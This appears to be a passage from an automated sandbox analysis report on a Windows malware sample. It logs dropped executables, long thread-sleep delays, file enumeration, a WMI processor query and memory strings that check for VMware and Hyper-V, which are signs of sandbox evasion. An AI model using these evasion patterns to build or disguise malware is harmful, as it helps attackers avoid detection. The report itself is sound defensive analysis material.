Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\v3efLAgS1BVue6uNuzFECLaH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\LIdx8BlqmZTW07MQOtXboF4f.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\xF7m0A44x6KodDxbhAtiDsub.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6792 Thread sleep count: 1173 > 30
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6792 Thread sleep time: -35190000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6872 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 1072 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 1072 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 3804 Thread sleep count: 1141 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 3804 Thread sleep time: -2283141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 5804 Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 2828 Thread sleep count: 1144 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 2828 Thread sleep time: -2289144s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 5804 Thread sleep count: 253 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 2756 Thread sleep count: 1326 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 2756 Thread sleep time: -2653326s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7508 Thread sleep count: 76 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7508 Thread sleep time: -152076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5600 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5600 Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5776 Thread sleep count: 944 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5776 Thread sleep time: -28320000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8068 Thread sleep count: 120 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8068 Thread sleep time: -240120s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8128 Thread sleep count: 111 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8128 Thread sleep time: -222111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7916 Thread sleep count: 111 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7916 Thread sleep time: -222111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5012 Thread sleep count: 108 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5012 Thread sleep time: -216108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5100 Thread sleep count: 100 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5100 Thread sleep time: -200100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8072 Thread sleep count: 112 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 8072 Thread sleep time: -224112s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8056 Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8056 Thread sleep time: -33000s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8416 Thread sleep count: 37 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8416 Thread sleep time: -74037s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8420 Thread sleep count: 40 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8420 Thread sleep time: -80040s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8436 Thread sleep count: 2567 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8436 Thread sleep time: -5136567s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8424 Thread sleep count: 2264 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8424 Thread sleep time: -4530264s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5808 Thread sleep count: 163 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5808 Thread sleep count: 119 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8440 Thread sleep count: 36 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8440 Thread sleep time: -72036s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8444 Thread sleep count: 35 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8444 Thread sleep time: -70035s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8432 Thread sleep count: 2236 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8432 Thread sleep time: -4474236s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8428 Thread sleep count: 2236 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8428 Thread sleep time: -4474236s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8544 Thread sleep count: 47 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8544 Thread sleep time: -94047s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8548 Thread sleep count: 56 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8548 Thread sleep time: -112056s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8564 Thread sleep count: 4717 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8564 Thread sleep time: -9438717s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8568 Thread sleep count: 53 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8568 Thread sleep time: -106053s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5752 Thread sleep count: 39 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8556 Thread sleep time: -56028s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8560 Thread sleep count: 4830 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8560 Thread sleep time: -9664830s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2740 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe TID: 3896 Thread sleep count: 830 > 30
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe TID: 3896 Thread sleep time: -24900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe TID: 8268 Thread sleep time: -720000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8344 Thread sleep count: 75 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8344 Thread sleep time: -150075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8348 Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8348 Thread sleep time: -138069s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8332 Thread sleep count: 2276 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8332 Thread sleep time: -4554276s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8204 Thread sleep count: 210 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8324 Thread sleep count: 2299 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8324 Thread sleep time: -4600299s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8320 Thread sleep count: 2268 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8320 Thread sleep time: -4538268s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8328 Thread sleep count: 2284 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8328 Thread sleep time: -4570284s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8336 Thread sleep count: 74 > 30
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe TID: 8336 Thread sleep time: -148074s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe TID: 7472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe TID: 8996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9036 Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9040 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9028 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8968 Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9048 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9044 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8968 Thread sleep count: 134 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9032 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9052 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 9056 Thread sleep time: -48024s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -599675s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -597269s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -596933s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8744 Thread sleep time: -900000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -596417s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -596128s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -595880s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -595737s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -595611s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -595269s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -592613s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -592174s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -591863s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -591362s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -588551s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -587988s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -587538s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -587006s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -586598s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -584013s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -583347s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -582588s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -579810s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -579036s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -578371s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -574082s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -573153s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -572475s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -571559s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -570854s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -570174s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -569384s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -568678s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -291318s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A33B0 FindFirstFileA,FindNextFileA, 9_2_008A33B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008C3B20 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 9_2_008C3B20
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00811F8C FindFirstFileExW, 9_2_00811F8C
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595737
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 592613
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 592174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 591863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 591362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 588551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 586598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 584013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 583347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 582588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 579810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 579036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 578371
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 574082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 573153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 572475
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 571559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 570854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 570174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 569384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 568678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 291318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData\Local
Source: d361f35322.exe, 00000024.00000003.2762447424.0000000001447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 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
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: MPGPH131.exe, 0000001B.00000002.3350736971.0000000001466000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Dk&Ven_VMware&P
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MPGPH131.exe, 0000001B.00000003.3206691270.0000000008155000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: d361f35322.exe, 00000009.00000003.2770271909.0000000007DE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 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
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000002.3073575028.0000000001418000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3350736971.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942487367.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2941258327.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2940853881.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3350736971.0000000001447000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2943456957.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2934755710.0000000001477000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2226894863.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2226894863.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ac861238af.exe, 00000010.00000003.7189145681.0000000000C76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: amert.exe, 00000007.00000003.1859371747.00000000011C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001418000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000;
